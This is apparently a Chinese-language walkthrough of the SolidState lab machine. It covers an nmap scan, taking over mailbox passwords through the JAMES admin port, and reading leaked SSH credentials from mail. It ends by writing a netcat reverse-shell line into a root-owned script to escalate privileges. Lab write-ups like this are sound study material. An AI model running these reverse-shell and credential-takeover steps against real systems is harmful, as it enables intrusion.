SolidState 靶机 walkthrough

扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -T5 -A -v -p- 192.168.80.141  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 03:50 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:50
Completed NSE at 03:50, 0.00s elapsed
Initiating NSE at 03:50
Completed NSE at 03:50, 0.00s elapsed
Initiating NSE at 03:50
Completed NSE at 03:50, 0.00s elapsed
Initiating ARP Ping Scan at 03:50
Scanning 192.168.80.141 [1 port]
Completed ARP Ping Scan at 03:50, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:50
Completed Parallel DNS resolution of 1 host. at 03:50, 0.00s elapsed
Initiating SYN Stealth Scan at 03:50
Scanning 192.168.80.141 [65535 ports]
Discovered open port 25/tcp on 192.168.80.141
Discovered open port 110/tcp on 192.168.80.141
Discovered open port 22/tcp on 192.168.80.141
Discovered open port 80/tcp on 192.168.80.141
Discovered open port 4555/tcp on 192.168.80.141
Discovered open port 119/tcp on 192.168.80.141
Completed SYN Stealth Scan at 03:50, 3.97s elapsed (65535 total ports)
Initiating Service scan at 03:50
Scanning 6 services on 192.168.80.141
Completed Service scan at 03:50, 11.06s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 192.168.80.141
NSE: Script scanning 192.168.80.141.
Initiating NSE at 03:50
Completed NSE at 03:50, 11.07s elapsed
Initiating NSE at 03:50
Completed NSE at 03:50, 0.22s elapsed
Initiating NSE at 03:50
Completed NSE at 03:50, 0.00s elapsed
Nmap scan report for 192.168.80.141
Host is up (0.00080s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.80.139 [192.168.80.139])
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
MAC Address: 00:0C:29:D3:16:CF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.000 days (since Mon Oct 24 03:50:09 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.80 ms 192.168.80.141

NSE: Script Post-scanning.
Initiating NSE at 03:50
Completed NSE at 03:50, 0.00s elapsed
Initiating NSE at 03:50
Completed NSE at 03:50, 0.00s elapsed
Initiating NSE at 03:50
Completed NSE at 03:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.16 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

搜索漏洞

查看脚本可以看到账号密码

登录4555端口，修改密码

查看几个用户的邮件，发现mindy密码

──(root㉿kali)-[/home/kali]
└─# telnet 192.168.80.141 110
Trying 192.168.80.141...
Connected to 192.168.80.141.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user mindy
+OK
pass 123
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

ssh登录

在opt下发现tmp.py，属于root，拥有写权限

在tmp.py中添加反弹shell，

echo ‘import os; os.system("/bin/nc 192.168.10.9 666 -e /bin/bash")’ > /opt/tmp.py